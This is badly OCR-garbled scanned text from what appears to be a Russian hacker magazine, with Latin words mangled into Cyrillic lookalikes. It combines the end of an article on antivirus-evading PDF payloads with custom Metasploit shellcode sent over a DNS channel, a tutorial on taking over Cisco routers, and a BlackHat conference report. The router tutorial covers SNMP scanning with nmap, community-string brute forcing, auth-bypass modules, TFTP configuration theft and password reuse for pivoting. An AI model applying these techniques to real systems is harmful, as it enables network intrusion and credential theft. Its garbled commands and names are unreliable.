Конечно, многие антивирусы могут ловить сие зло в процессе, 
не по сигнатурам, но все же пробив связки 6АѴА + РОЕ оказался 



около 50%. Учитывая, что тестируемая компания использует два 
антивируса, на гейтвее и на рабочих станциях, — показатель 
неплохой. Кроме того, был получен результат от нескольких поль- 
зователей без интернета, которые располагали только доступом к 
почте. Все это говорит о том, что йЫБ-протокол как канал связи 
может быть легко и без проблем использован злоумышленниками. 
И специалистам по ИВ в банках, корпорациях, промышленности, 
госструктурах нужно мыслить шире, а не просто интегрировать 
дорогой хлам, 01_Р-системы (интересно, следят они за СІЫБ?) и 
обрезать интернет для сотрудников. Это не панацея — это пустая 
трата денег компании. 

Но я отвлекся. Несмотря на то, что эксплойтами я не пользовал- 
ся, задача сделать нормальный пейлоад осталась. Во-первых, 
мало ли, вдруг появится хороший Одей? Во-вторых, не у всех 
есть антивирь, и в конечном счете, если пользователь откроет 
РОЕ с нормальным сплойтом, а не с автозапуском с дополни- 
тельным вопросом, то вероятность пробива может быть выше (не 
нужно надеяться на решение пользователя в вопросе запуска 
аттача АсгоЬаІ Реасіег'ом). Ввиду отсутствия времени шелл-код 
был написан в кратчайшие сроки и выполнен в роли модуля для 
метасплойт (лежит на диске). Из плюсов отмечу то, что он на 
шестьсот байтов меньше, чем у Рона, и поэтому охотно встраи- 
вается в те эксплойты, в которые творение Рона лезть не захоте- 
ло. Шелл-код работает в ѴѴіпбоѵѵз 7 также без сокетов, что озна- 
чает — I) АС будет молчать. Из минусов — он заметен (мигают 
черные окошки). Ну и опять же, для моих задач интерактивность 
не нужна, поэтому смысл у него такой же, как и у экзешника 
(алгоритм такой же, все делаем через _рореп). Еще замечание — 
не стоит делать из данного шелл-кода ЕХЕ/ѴВ5 или ЗАМА, так как 
он не использует І_оасИ_іЬгагу, а ищет в списке модулей уже под- 
груженную библиотеку тзѵсіісііі, Она есть во всех мало-мальски 
достойных приложениях, и поэтому шелл-код стабильно рабо- 
тает, но при генерации бинарника из метасплойт этот модуль 
не подгружается. В любом случае, сейчас я работаю над более 
универсальным ВЫБ-рауІоасГом, который будет лишен указанных 
недостатков, и возможно, что к моменту выхода номера в свет он 
уже будет доступен на сізесгд.сопп :). т 
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■ ■ Мирослав Берков (аіитпі.затагагадтаіі.сот) 



Кошачьи 

игры 

Новый подход к анализу 
маршрутизаторов Сізсо 




• Сегодня маршрутизаторы производства Сізсо Зузіешзлежатв 
основе всемирной паутины. Они достаточно часто встречаются в 
ходе проведения работ по тестированию на проникновение, причем с 
привилегированным доступом Іеѵеі 15, что позволяет использовать 
их для дальнейшего развития атак на корпоративные сети и платеж- 
ные системы. Да, слабые места в Сізсо 105 присутствуют, как и в лю- 
бом другом ПО, но лишь немногие специалисты умеют пользоваться 
недостатками самого 105, используя Кетоіе ВиІІег ОѵегНоѵѵ... 



«Кис-кис-кис», или 

как обнаружить кошку в Сети 

Для начала проанализируем общее состояние дел с безопасностью 
Сізсо 105. Сканеры уязвимостей делают большую работу по выявле- 
нию устаревших версий 105. Это хорошо работает для определения, 
пропатчено устройство или нет, но нисколько не помогает тестиров- 
щику, который не имеет за плечами большого опыта исследований 
Сізсо 105. За редкими исключениями, остается небольшое количе- 
ство служб, которые обычно используются во внутрикорпоративной 
сети компании, и доступ к ним из общей Сети, как правило, запре- 
щен. Например, это могут быть 5ЫМР, Теіпеі, 55Н, НТТР и НТТР5. Но 
на практике найти кошку в мутной воде всемирной паутины с откры- 
тыми портами во внешний мир на сегодняшний день достаточно 
легко. Ты также можешь найти запущенную службу Ріпдег, обеспечи- 
вающую взаимодействие служб мультимедиа протоколов, таких как 



5ІР и Н.323, но для получения удаленного доступа к маршрутизатору 
следует тестировать преимущественно первые пять служб. 

Первая служба, которую я хочу обсудить, это 5ЫМР Как ни странно, 
5ЫМР часто оставляют без присмотра на большом числе маршру- 
тизаторов. Причиной этого может быть общее непонимание того, 
чем 5ЫМР является на самом деле. 5ітр1е Ыеіѵѵогк Мападетепі 
Ргоіосоі предоставляет широкий спектр информации в большом 
наборе систем в стандартном формате. Независимо оттого, кто 
производитель вашего коммутатора или маршрутизатора, почти 
любой клиент 5ЫМР-мониторинга программного обеспечения будет 
работать с этим устройством, при условии, что 5ЫМР включен и 
настроен. 

Многие сетевые администраторы не понимают, что 5ЫМР предо- 
ставляет слишком широкий спектр информации о работающем 
устройстве, а записи сообществ 5ЫМР могут быть использованы 



► обо 
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для получения полного контроля над этим устройством. В случае с 
Сізсо 105 записываемые сообщества 5ЫМР могут быть использо- 
ваны для выгрузки или загрузки и запуска альтернативной конфи- 
гурации устройства, либо изменения его текущей конфигурации. 
Маршрутизатор с включенной службой Теіпеі и с тривиальным 
паролем может быть угнан почти мгновенно через записи сообще- 
ства 5ЫМР. Я обычно ищу кошки при помощи 5ЫМР и старого 
доброго сканера птар. Да-да, именно с помощью него Тринити 
взломала во второй серии Матрицы сеть электростанции, и именно 
его так любят использовать в АНБ. В дистрибутив птар включены 
два интересных сценария для работы с 5ЫМР — это ЗЫМР-зузсІезсг. 
пзе и зптр-ЬгиІе.пзе. Для удобства использования я немного 
изменил первый таким образом, чтобы полученный отклик с опи- 
санием устройства сразу сохранялся в файле ір_\л/ііЬ_5птрТхІ. Сам 
сценарий, конечно же, ищи на нашем ОѴВ. Итак, а что же мы будем 
сканировать? Например, можно просканировать своего провайдера, 
предварительно узнав все принадлежащие ему ІР-префиксы, про- 
сто зайдя по адресу Ьдр.бе.пеі и скопировав все циферки из разде- 
ла Ргебхез ѵ4 в файл ту_ІеІ.есот.ІхЕ Командная строка для запуска 
птар будет выглядеть следующим образом: 

птар -зЦ -п -РѲ -ѵ -р 161 - -5сгір1:=5птр-5у5 . пзе -ІІ_ ту_ 
іеіесот.ііхі: 

-5ІІ — ведь правда, что служба 5ЫМР работает по ШР протоколу, 
поэтому мы и задействуем только ШР-сканирование; 

-р 161 — через 161-й порт; 

-ѵ — это я хочу видеть ход процесса на экране; 

-п — не определять имена 0Ы5 для найденных хостов (и вправду, 
сейчас они мне совершенно ни к чему); 

-РѲ — не пинговать хосты в процессе сканирования. 

Я обычно пользуюсь консольной версией, потому как 6111- 
интерфейс к ней нещадно зависает при таких объемах сканиро- 
вания. Просто создай .Ьаі-файл в каталоге, где лежит птар с этой 
командной строкой, и запусти его. 

Все эти опции заметно убыстряют процесс предварительного ска- 
нирования. 

Итак, в результате мы получим что-то вроде этого: 

172.154.10.34 Сібсо 105 Бо-Рімаге, с7600гзр72043_ 
гр Бо-Р-Ыаге (с7600гзр72043_гр-АОѴІР5ЕКѴІСЕ5К9-М) , 

Ѵегзіоп 12.2(33)5802, КЕІ_ЕА5Е БОРТІлІАКЕ (-Рс2) 

Тесііпісаі Биррогі:: ЪЪЪр:/ /шм. сібсо. сот/1:есІі5иррог1: 

Соругі§Іі1: (с) 1986-2009 Ьу Сібсо БузіешБ, Іпс. 

Сотрііесі ІлІесІ 20-Мау-09 2 Бузіет ирііте: 117 сіауз, 

7:11:43.12 (1013470312 іітеііскз) 



Киска лакает молоко 

И спрашивается, что нам с этой байдой делать дальше? А вот 
что — натравливаем на найденную киску МеІазрІоіЕ В прин- 
ципе, есть два варианта использования: можно пользоваться 
М еіазріоіі; Ргатеѵѵогк, а можно использовать автоматический 
анализатор Меіазріоіі Рго. Для старых версий операционной 
системы Сібсо 105 известно несколько уязвимостей НТТР. Две 
из них, о которых сейчас пойдет речь, относятся к уязвимостям 
типа «Обход аутентификации». Первая уязвимость СѴЕ-2000- 
0945 относится к отсутствию проверки подлинности в Іпіегіасе 
Мападег Сібсо 105 устройств. Этот баг позволяет не прошедшим 
проверку подлинности получить привилегированный доступ к 
устройству с Сібсо 105 через веб-интерфейс. Вторая уязвимость 
СѴЕ-02001 -0537 позволяет обойти проверку подлинности, ука- 
зав уровень проверки подлинности выше, чем «15» в запросе 
НТТР. Это также предоставляет привилегированный доступ к 
устройству через веб-интерфейс. С открытым исходным кодом 
М еіаврІоМ; Ргатеѵѵогк в настоящее время обеспечивает оба 
модуля для эксплуатации этих уязвимостей: 

1 . /аихі1іагу/5саппег/ІтІ:1:р/сІ5со_сІеѵісе_тапа§ег 

2. /аихі1іагу/5саппег/Іі1:1:р/сІ5со_іо5_аи1:Іі_Ьура55 

Меіазріоіі Ехргезз и Меіазріоіі Рго автоматически распознают Сібсо 
105 НТТР-службу во время сканирования. 

Проверь эти два недостатка и используй их для получения доступа к 
рабочей конфигурации устройства. 

В дополнение к этим двум известным уязвимостям, пароли 
устройства также могут быть найдены путем перебора с исполь- 
зованием службы НТТР. Протокол НТТР является довольно 
быстрым по подбору пароля по сравнению с медленными 
терминальными службами Теіпеі и 55Н. Меіазріоіі Ехргезз и 
Меіазріоіі Рго автоматически скопируют рабочую конфигурацию 
устройства после успешного подбора пароля к службе НТТР 
устройства Сібсо 105. Меіазріоіі Рго и Меіазріоіі: Ргатеѵѵогк 
(равно как и сканер птар в комплекте со сценарием зптр- 
ЬгіЛе.пзе) включают в себя модуль 5ЫМР Ьгиіе Ьгсе Іооі, напи- 
санный в качестве вспомогательного модуля, который может 
использовать словарь общих паролей для идентификации дей- 
ствительных сообществ маршрутизатора и определяет, являются 
ли они только для чтения, или для чтения и записи. В допол- 
нение к основному модулю подбора пароля к 5ЫМР, Меіазріоіі 
теперь содержит модуль, который использует сообщества 5ЫМР, 
доступные для записи, выгрузки/загрузки и запуска альтерна- 
тивной конфигурации устройства. Вот на этом и остановимся 
подробнее. Запускаем наш любимый Меіазріоіі; Ргатеѵѵогк: 
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Рис: 3 Настраиваем конфиг 



ГП5-Р > тв-РгрссІ -5 -II тзТ -Р 123 

Сначала находим с помощью 5ЫМР Соттипііу Зсаппег имя геасі- 
ѵѵгііе сообщества (см. рис.1). 

Далее для выгрузки конфигурации из горячей киски выбираем кон- 
фиг (см. рис 2). 

Далее настраиваем ТРТР-сервер (см. рис 3). Никакого ЫАТ — 
сообщенный киске ІР-адрес, куда выгружать конфиг, должен быть 
белым. 

И, собственно, получаем сам файл конфигурации (см. рис 4). 

То же самое можно проделать с использованием Меіазріоіі Ехргезз 
и Меіазріоіі Рго — они используют оба эти модуля для автомати- 
ческого захвата файла конфигурации уязвимых устройств с Сізсо 
105. Во время сканирования подбор паролей к ЗЫМР-сообществам 
запускается в фоновом режиме с небольшим списком слов из обще- 
го словаря. Если любой из этих паролей работает, и если хотя бы 
одно сообщество обнаружено как записываемое, тогда Меіазріоіі Рго 
настроит локальную службу ТЕТР и скачает файл конфигурации этого 
устройства. Протокол 5ЫМР теперь также интегрирован в средства 
интеллектуального подбора паролей, компонент которых использует 
список наиболее популярных имен сообществ в дополнение к дина- 
мически генерируемым паролям. Этот список получен в результате 
исследовательского проекта по изучению паролей веб-форм и встро- 
енных файлов конфигурации. Так, проанализировав результаты, мы 
определили, какие пароли чаще всего используются, в том числе для 
ЗЫМР-сообществ. Результаты этого проекта были удивительны: наи- 
более широко используются пароли «риЫісйЕЗО» и «ргіѵаІеІсІЕ50», 
как это описано в примере конфигурации в документации Сізсо. 



Последние два протокола, которые хотелось бы обсудить, это Теіпеі 
и 55Н. Эти протоколы и обеспечивают доступ к удаленной команд- 
ной оболочке на целевом устройстве под управлением Сізсо 105 
(как правило, для непривилегированных пользователей). Наиболее 
заметным отличием одного протокола от другого является то, что 
55Н часто требует знания удаленного имени пользователя и пароля, 
в то время как Теіпеі обычно запрашивает только пароль для про- 
верки подлинности пользователя. Меіазріоіі Егаппеѵѵогк содержит 
модули подбора паролей с использованием этих протоколов и будет 
автоматически создавать интерактивные сессии до тех пор, пока 
подходящий пароль не будет найден. В целом Меіазріоіі Ехргезз и 
Меіазріоіі Рго всегда имели на борту готовые модули тестирования 
сетевых устройств через Теіпеі- и 55Н-протоколы, но в последней 
версии стало возможным использовать список наиболее часто 
используемых паролей, составленный нашими аналитиками. В 
самом начале списка слов приведены необычные пароли. В целом 
подбор по словарю очень эффективен, если в качестве пароля для 
доступа к устройству было использовано реально существующее 
слово. Не углубляясь слишком далеко, я могу сказать, что некоторые 
провайдеры часто используют один и тот же пароль для настройки 
абонентского оборудования. 

После того, как был подобран пароль и установлена рабочая сессия 
через Теіпеі- или 55Н-протоколы устройства Сізсо 105, функция 
автоматического сбора информации, включенная в Меіазріоіі 
Ехргезз и Меіазріоіі Рго, автоматически считает информацию о 
версии 105 и список активных пользователей, а затем попытается 
получить пароль к доступу «епаЫе» путем перебора по списку наи- 
более распространенных паролей. Если попытка подобрать пароль 
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Рис: 4 Получаем результат 



«епаЫе» увенчается успехом, то автоматически ты получишь допол- 
нительную информацию о системе, в том числе о текущей конфигу- 
рации устройства. 

В исследованиях, перечисленных выше, нет ничего нового. Новым 
является лишь простота использования продуктов Меіазріоіі и их 
способность по цепочке автоматически скомпрометировать уяз- 
вимые устройства. По большому счету, эти тесты являются лишь 
ориентиром для дальнейшего развития исследований безопасности 
сетевых устройств. И есть еще одна вещь, о которой я не упомя- 
нул до сих пор. Что же мы будем делать с полученными файлами 
конфигурации Сізсо 105 после того, как мы их получим в процессе 
тестирования сетевых устройств? Эти файлы содержат рабочие 
конфигурации устройств, включающие в себя ѴТУ-пароли, паро- 
ли «епаЫе», ключи ѴРІ\І, 551-сертификаты и параметры доступа 
к ѴѴі-Рі. Меіазріоіі будет автоматически обрабатывать эти файлы 
конфигурации, чтобы выбрать из них конфиденциальные данные и 
сохранить их как данные аутентификации. 

Меіазріоіі Ехргезз и Меіазріоіі Рго могут автоматически исполь- 
зовать полномочия, полученные из файлов конфигурации, чтобы 
получить доступ к другим устройствам этой же сети. Если доступ 
был получен к одному из устройств Сізсо через слабые сообще- 
ства 5ЫМР, и было обнаружено, что ѴТУ-пароль — «сізсоги Іез !», 
то ты можешь использовать профиль подбора паролей «кпоѵѵп- 
опіу» для того, чтобы с помощью любого протокола автоматически 
попробовать этот пароль в отношении любого другого устройства 
в той же самой сети. После того, как ты получишь доступ к другим 
устройствам, конфигурационные файлы будут получены на твой 
компьютер и запустится процесс их анализа. Ты можешь легко при- 



менить пароли, взятые из маршрутизаторов Сізсо, для входа на сайт 
интрасети или использовать их для получения доступа к множеству 
других сетевых устройств. 



Переполнение буфера 
в маршрутизаторе Сізсо. 
на обнове процессора Моіогоіа 



Исследовательская группа по проблемам безопасности РЬепоеІіІ; 
когда-то давно создала программу с кодом командного интер- 
претатора для проведения удаленной атаки на маршрутизатор 
Сізсо 1600 на основе процессора Моіогоіа 68360 ОІЛСС (про- 
грамма была представлена на азиатской конференции Віаскбаі 
аж в 2002 году). 

Для этой атаки в векторе вторжения используется переполнение 
буфера в операционной системе 105 от Сізсо и несколько новых 
методов использования структур управления кучей в 105. Изменяя 
структуры кучи, можно внедрить и исполнить вредоносный код. В 
опубликованном варианте атаки код командного интерпретатора 
представляет собой созданный вручную код в виде машинных 
команд Моіогоіа, который открывает потайной ход на маршрути- 
заторе. Этим кодом можно воспользоваться при наличии любого 
переполнения буфера в устройствах Сізсо (более подробная инфор- 
мация об этой атаке доступна по адресу рбепоеііі.сіе ). И теперь ты, 
как настоящий гуру устройств Сізсо, можешь смело поместить этот 
шелл-код в свою коллекцию Меіазріоіі Егатеѵѵогк для последую- 
щих экспериментов по удаленному переполнению буфера и его 
запуска на удаленном устройстве. Но это уже будет совсем другая 
история... ц-с 
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► Обз 



взлом 



ѴѴВХОМЕ 
ТО ВиСКНАТ! 

Отчет с популярной хакерской конференции 

За пятнадцать лет своего существования эта конференция прошла 
путь от небольшого междусобойчика до ключевого зесигіІу-еѵепГа, 
проходящего четыре раза в год и собирающего до 10 000 участников. 
В этом году мне наконец посчастливилось исполнить свою детскую 
мечту и выступить на ВІаскНаІ. 



К сожалению, это произошло не в Лас-Вегасе, а всего лишь в 
Вашингтоне, но, тем не менее, это все-таки ВІаскНаТ Хоть и не 
совсем тот, но, надеюсь, все впереди. 

Честно говоря, с самого начала я был немного удивлен и ожидал 
чего-то большего. Традиционно ВІаскНаі, который проводится 
в Вашингтоне, ориентирован на представителей американских 
военных ведомств и государственных учреждений, которым, 
видимо, не по статусу куда-то далеко уезжать из своего города. 

В этом есть и свои плюсы — на ланче можно обменяться визит- 
ками с каким-нибудь директором по безопасности федерального 
резервного банка Нью-Йорка, а твои доклады услышат Пезропзе 
Теат Огасіе, которым потом будешь рассказывать, что у них 
не так с безопасностью. В общем, народу не десять тысяч, как 
в Вегасе, но зато все пришедшие ориентированы на доклады, 
а не на тусовку. Юбычно программа конференции заключается 
в следующем. Сперва в течение двух-четырех дней проводятся 



тренинги по безопасности от лучших мировых спецов. Тренинги 
действительно грамотные — например, пользованию тем же мета- 
сплойтом обучают авторы метасплойта. Собственно, аналогичная 
ситуация и в других областях. Тренинг на ВІаскНаі — это очень 
круто. Правда, цены кусаются ($3500 за курс), но если прикинуть 
объем данных и количество времени, которое придется потратить 
на самостоятельное изучение того же материала, то и цены начи- 
нают казаться вполне адекватными. Тем не менее, стоит отметить, 
что ничего кардинально нового в плане неопубликованных мето- 
дик на тренинге ты не услышишь (в отличие от докладов), зато 
все разложат по полочкам и помогут на практике отработать весь 
материал. Тренинги, как мне кажется, очень полезны, если тебе 
необходимо в кратчайшие сроки изучить какую-нибудь неизведан- 
ную ранее область — к примеру, «Мае Наскіпд Сіазз» от Дино Дай 
Зови или «НРЮ, Ассезз Сопігоі & Віотеігіс Зузіетз». А тренинг 
на тему Репіезііпд ѴѴіІб Ьаскігаск в этот раз вел мой друг Вал Смит 



► 064 
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Набор для прослушки 6РВ5 и ЕООЕ сетей 



из компании Аиаск РезеагсЬ, с которым мы, собственно, делали 
совместный доклад на ВІаскНаЕ Его тренинг назывался «Тасіісаі 
Ехріоііаііоп» и описывал методики проведения тестов на проникно- 
вение без использования программных уязвимостей, сосредоточив- 
шись на архитектурных багах и социальной инженерии. В общем, 
рассказывал он о том, на что должен быть похож настоящий пентест 
(в отличие оттого, что сейчас предлагают на рынке в виде запуска 
метасплойта). 

В целом в Вашингтоне в этот раз было совсем немного тренингов, 
зато появились воркшопы — нечто среднее между докладом и тре- 
нингом. Воркшоп обычно рассчитан на два-три часа и представляет 
собой некую демоверсию тренинга: то, что не уместится в рамки 
доклада, но и на полноценный курс не тянет. 

По времени тренинги идут параллельно основным секциям докла- 
дов, что ставит нелегкую проблему выбора. Всего на конференции 
было четыре параллельных секции: по две на доклады и воркшопы, 
поэтому каждый раз приходилось решать, кого же отправиться слу- 
шать (или вообще остаться пообщаться с людьми в холле). На всех 
предыдущих конференциях, где я выступал, было по две параллель- 
ных секции, что гораздо удобнее. Впрочем, на ВІаскНаІ І_а5-Ѵедаз 
их вообще по восемь-десять, так что не все так плохо. Главное, что 
есть из чего выбирать. Собственно, воркшопы в этот раз были сле- 
дующие: 

• СуЬег-а1:1:аск5 Ео 5АР рІаЕ-Рогтв: ТМе Іпзісіег ТІігеаІ: - 

от моего аргентинского коллеги; 

• Реасб Ріі 22 Іп§ от Майкла Эддингтона; 

• Нагсімаге Кеѵегзе Еп§іпеегіп§: Ассезз, Апаіуге апсі 

Ое-Реаі:; 

• Ном ѣо Наск І_аг§е Сотрапіев апсі Маке Мііііопв; 

• ТМе Мае ЕхрІоіЕ Кі1:сМеп от Винченцо Иоццо и Дино 

Дай Зови. 




Сравнение скоростей ОРУ и СРУ 



начале этого года - это самый молодой участник конференции, 
Томас Рот, ему всего девятнадцать лет. Вообще меня слегка удивил 
средний возраст участников: когда я вернулся, меня кто-то спро- 
сил: «Ну что? Ты там был самым молодым?». Если бы... На самом 
деле, большинству докладчиков меньше двадцати пяти лет: Исааку 
Аврааму - двадцать три, Мариано Нунезу - двадцать пять, Ральфу- 
Вильяму тоже не больше, он вообще студент. Да и остальные не 
намного старше, хотя, конечно, и старые аксакалы попадались. 

Итак, возвращаемся к докладу Томаса Рота, в просторечье - 
«Джастина Бибера». Если бы ты только знал, как этот парнишка 
похож на Джастина! Половина докладчиков только это и обсуждала. 
Парень был реально звездой мероприятия. Еще бы, выступить на 
Блекхат в девятнадцать лет, да еще и быть копией популярного 
певца. Или может это скрытая вторая жизнь, кто знает... 

В общем, ты наверняка слышал недавнюю шумиху на тему того, что 
некий исследователь взломал ѴѴРА2, используя облачные вычисле- 
ния. Так вот — это было про него. Правда, журналисты как всегда 
все переиначили, и смысл события был отнюдь не в ѴѴРА, но кто уж 
теперь вспомнит... Кстати, все те, кто писал про пресс-релиз этого 
парня гнусные комментарии на форумах — знайте, он тут не при- 
чем. Парень действительно толковый, и никому он не доказывал, 
что взломал ѴѴРА2. Смысл доклада - показать, как просто сейчас 
каждый может организовать распределенный перебор паролей 
на графических процессорах, используя сервисы Аппагоп. Начнем 
с банального сравнения - перебор паролей на четырехъядерном 
Соге І7 происходит примерно в двадцать пять раз медленнее, чем 
на кластере из четырех карт ѲеЕогсе 295 6ТХ. А вот конфигурация 
стандартной ѲРІІ-ячейки в облаке Атагоп: 



В общем, все достойны, но посетил я, естественно, первый, хотя 
практически ничего нового там не узнал. Наверное, стоило бы 
сходить на Дино Дай Зови, но жалко было пропускать целых три 
доклада. 

Также на конференции была выставка вендоров, где были пред- 
ставлены стенды таких компаний, как Ра ріеі 7, Ыеззиз, ІОАсбѵе, 
СогеЗесигіІу и прочих. Там, кстати, можно было получить в подарок 
футболку Меіазріоіі или ІМеззиз (правда, они были рассчитаны на 
американцев, и размеров меньше ХЕ не было в принципе). На стен- 
дах в том числе выставлялась НВбаггу, которая недавно неслабо 
облажалась, попытавшись разобраться с анонимусами. Вообще, 
заметно невооруженным взглядом, что основная масса вендоров 
направлена на Еогепзісз-софт. Это новый зарубежный тренд, да и 
до нас уже добирается. 

Доклады 

Но перейдем наконец к докладам. Основное событие, ради чего 
существует ВІаскНаЕ и о чем потом месяц треплется пресса по 
всему миру. Как раз об одном из докладчиков писали все СМИ в 



22СВ КАМ 

2 х ІпЕеІ Хеоп Х5570 
2 х ІЧѴЮІА Тезіа гг Регті" М2050 
$2. 10/час 

В результате за $16 в час, используя восемь ОРЕІ-инстансов, мы 
получаем скорость 400 000 РМК (подбор ключей для ѴѴРА) в секун- 
ду, что в несколько тысяч раз больше, чем на РС. Софтину, которая 
позволяет реализовывать эти действия, Томас обещал выложить в 
свободный доступ, но пока с этим возникли проблемы из-за немец- 
ких законов. В общем-то, написать ее самому не такое уж и сложное 
дело, но парнишка все равно молодец! 

Любителям докладов похардкорнее могу предложить еще два 
выступления: первое от Винченцо Иоццо и Джованни Гола - «Зіаіе 
роіпіегз аге Йіе пеѵѵ Ыаск» (про то, как искать уязвимости класса 
бапдііпд роіпіегз, боиЫе ітеез и и піпіііаіігесі плетогу), второй — 
доклад Тарьея Мандта «Кегпеі Рооі Ехріоііаііоп оп ѴѴіпсІоѵѵз 7» (тут 
все понятно из названия). Но об этом знающие люди напишут под- 
робнее, а я перейду к другим докладам. 
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Рассмотрим доклады, которые я объединил в актуальную на дан- 
ный момент тему безопасности мобильных устройств, протоколов 
и операционных систем. Начнем с модной нынче темы мобильной 
безопасности. К слову, если у тебя есть мысли по поводу исследо- 
ваний в этой области, то я тебе гарантирую — тема перспективная и 
еще себя покажет. Как, впрочем, и тема бизнес-приложений, о чем 
будет сказано в конце статьи. 

Если посмотреть на статистику докладов по различным операци- 
онным системам, да и вообще на интерес к ним, то явно видно, что 
Ыпих сейчас как-то не в моде, да и винда уже давно сдает позиции, 
а вот Мае 05, АпбгоісІ, ВІаскВеггу - набирают популярность. В юзер- 
ском сегменте мобильные ОС точно со временем вытолкнут винду и 
линукс, так что, господа троянописатели, меняйте профиль. 

Итак, хватит лирики, приступим к делу. В докладе «Рорріпд ЗИеІІ оп 
А(псІгоісІ)РМ Беѵісез» молодой израильский исследователь Исаак 
Авраам рассказал подробности написания шелл-кода под андройд 
и АРМ-железо (эх, зря я в универе прогуливал лабы по микрокон- 
троллерам). Итак, на черном рынке эксплойт под ѴѴеЬкіІ (движок 
браузера, используемый в Ѳоодіе СЬготе) стоит $35000-39000, и это 
клиентская часть, то есть эксплуатация требует какого-то действия 
от пользователя. Уязвимость через 5М5 или 05М-трафик будет 
стоить гораздо больше. Это было коммерческое обоснование про- 
деланной им работы, а сделал он следующее: написал эксплойт 
под уязвимость, обнаруженную им же в андроиде. В общем, стан- 
дартная техника РЕТ2ЫВС на АРМ-процессорах не работает, ибо 
там другая архитектура, и он выдумал три новых методики (о них ты 
сможешь прочесть, скачав слайды), а потом успешно применил их 
к найденной им 0-бау уязвимости в ѵѵебкіі, показав ее на Моіогоіа 
ОгоісІ. Но не тут-то было. По умолчанию пользователь имеет лимити- 
рованные права в системе, и после получения шелла надо, так или 
иначе, повысить привилегии. Один из вариантов — это бесконеч- 
ные попытки вызова приложения, пока пользователь не устанет 
нажимать «сапсеі» и не согласится его запустить. Другой вариант 
использует методы социальной инженерии — это модификация тек- 
ста о попытке запуска неразрешенного приложения. В общем, полу- 
чилось довольно круто, а самое поразительное — это уязвимость, 
которую он обнаружил. Я до сих пор в шоке, как такое возможно в 
нашем веке - оставить багу в 11Р1_-строке, которая находится про- 
стейшим фазером! 

Продолжаем мобильную тему и переходим к докладу Диониса 
Блазакиса «ТЬе Арріе ЗапсІЬох». Этот исследователь уже наделал 
много шума год назад, рассказав про новый метод атак Лі-5ргау, 
идею которого развил Алексей Синцов. На этот раз Дионис сделал 
доклад в том же стиле общих слов. Правда, если в прошлом году он 
выдал идею, но не представил реализацию, то в этом году он просто 
рассказал, что такое Арріе ЗапсІЬох (ХКІІІ ЗапсІЬох) и как она устрое- 
на, чтобы помочь ресечерам в попытках найти уязвимость в этой 
системе. Разговор идет о так называемой песочнице Арріе, в кото- 
рой с ограниченными правами запускается браузер и приложения, 
не входящие в группу доверенных. 



График популярности бизнес-приложений 

Соответственно, мечта многих — обойти этот механизм. Дионис 
признался, что обойти он его не смог, но вот различный инструмен- 
тарий для упрощения дальнейшего анализа представил в избытке. 
Так что, если есть желающие повторить путь Алексея и продолжить 
новое исследование Диониса - вперед! Мировая слава и +500 к 
фолловерам в твиттере прилагаются. 

Теперь переходим от софтверной части к более железной и рас- 
смотрим доклад Давида Переса и Жозе Пико под названием 
«А ргасіісаі аііаск адаіпзі 6РР5/Е0ѲЕ/ІІМТ5/Н5РА плобііе баіа 
соттипісаІіопБ». Одна из тем, о которой кто-то в конце концов 
должен был рассказать. И вот оно, собственно, свершилось — после 
того, как всем уже стало понятно, что 05М-трафик легко прослу- 
шивается (Ргасіісаі СеІІрЬопе Зруіпд. СЬгіз Радеі. ОЕЕ СОЫ 18 .Му 
2010). То есть, цена девайсов упала до сотен долларов, ПО для 
симуляции базовой станции (ОрепВТЗ) и проведения атак с ложной 
точкой доступа стало доступно всем, а исследователи перевели 
взгляд на более актуальные протоколы мобильной связи. 

Итак, для перехвата 6РР5- и ЕООЕ-трафика понадобится ір.ассезз 
папоВТЗ - профессиональная базовая станция с ІР-интерфейсом. 

А также набор различного открытого софта, который ты можешь 
найти на слайдах, и Сеіірбопе 5апптег (по-русски — глушилка 
для диапазонов ІІМТ5/Н5РА). Собственно, в описанной атаке нет 
ничего необычного, теории тут немного, главная проблема — это 
софт и железо. Сперва атакующий пытается подобраться как можно 
ближе к жертве. Затем прослушивает канал и устанавливает свою 
ложную ВТ5-станцию со всеми данными в обнаруженной свободной 
ячейке. Дальше остается лишь убедиться в том, что канал связи с 
интернетом налажен, и спокойно дожидаться, когда жертва пере- 
подключится к твоей станции. После чего, используя ноутбук и софт 
по перехвату пакетов, можно творить любые атаки. 

В том числе было показано, как подменять трафик для і РЬопе/і РасІ- 
приложений и перехватывать пароли от мобильных банк-клиентов. 
Аналогично можно красть и одноразовые пароли, передаваемые 
по 5М5, что сейчас считается самым безопасным способом. Также 
докладчик продемонстрировал, что ІІМТЗтоже не безопасен, если 
телефон поддерживает более ранние протоколы, так как можно 
сперва включить II МТ5- глушилку, заставив телефон перейти на 
использование Ѳ5М, а потом вернуться к первому пункту. 

Чтобы окончательно добить тебя темой безопасности мобильных 
устройств, расскажу про доклад Ральфа-Филиппа Вейнмана из 
университета Люксембурга. Доклад называется «ТЬе ВазеЬапсІ 
Аросаіурзе» — он тоже наделал немало шумихи в новостных источ- 
никах. Как только исследователи получили в руки софтверный 
инструмент для отправки пакетов по ѲЗМ-протоколу, то стало воз- 
можным проводить атаки на драйвера Ѳ5М-модуля, используемого 
в телефонных аппаратах. Ровно такая же история произошла лет 
пять назад, когда было обнаружено первое переполнение буфера 
в драйверах ѴѴі-ЕІ устройств, правда там оно нашлось фаззингом. 



► 066 
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Пример грамотной презентации от Зутапіес, 
слайд #1 

Здесь же исследователь решил пойти путем реверс-инжиниринга 
драйверов. Преимущество атак на драйвера, помимо всего прочего, 
заключается в том, что они никак не защищены. Нет защиты кучи, 
нет А5І_Н, нет ЫХ-бита (за исключением чипсета Іпбпеоп ХММ6180, 
используемого в ІРЬопе 4). В общем, после тщательного реверсинга 
докладчик нашел немало багов в прошивках Оиаісотт и Іпбпеоп, 
продемонстрировав удаленные атаки на іРЬопе и НТО Огеат. Во 
время доклада, как это зачастую и бывает, атака не сработала, но 
позже в кулуарах желающие смогли убедиться в ее реальности. 

А главное заключается в том, что если запустить такую ложную 
базовую станцию в месте массового скопления людей и посылать 
пакеты с эксплойтами, то можно заполучить доступ к немалому 
количеству мобильных устройств. Ну или перепрошить их так, что 
они превратятся в кирпичи :). 

Кстати, все доклады на блекхате сопровождаются вайтпейперами 
(документами, подробно описывающими то, что представлено в 
презентации). Зачастую презентация состоит из набора картинок и 
малопонятных слов (предполагается, что основную часть доклад- 
чик будет произносить вслух), так что для полного понимания сути 
доклада рекомендуется читать вайтпепер. 
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Вайлд, вайлд веб 



Теперь порадую немного фанатов веба. Кто еще не слышал про 
модный І_ауег7 РОЗ? Тогда мы идем к вам. На седьмом уровне 
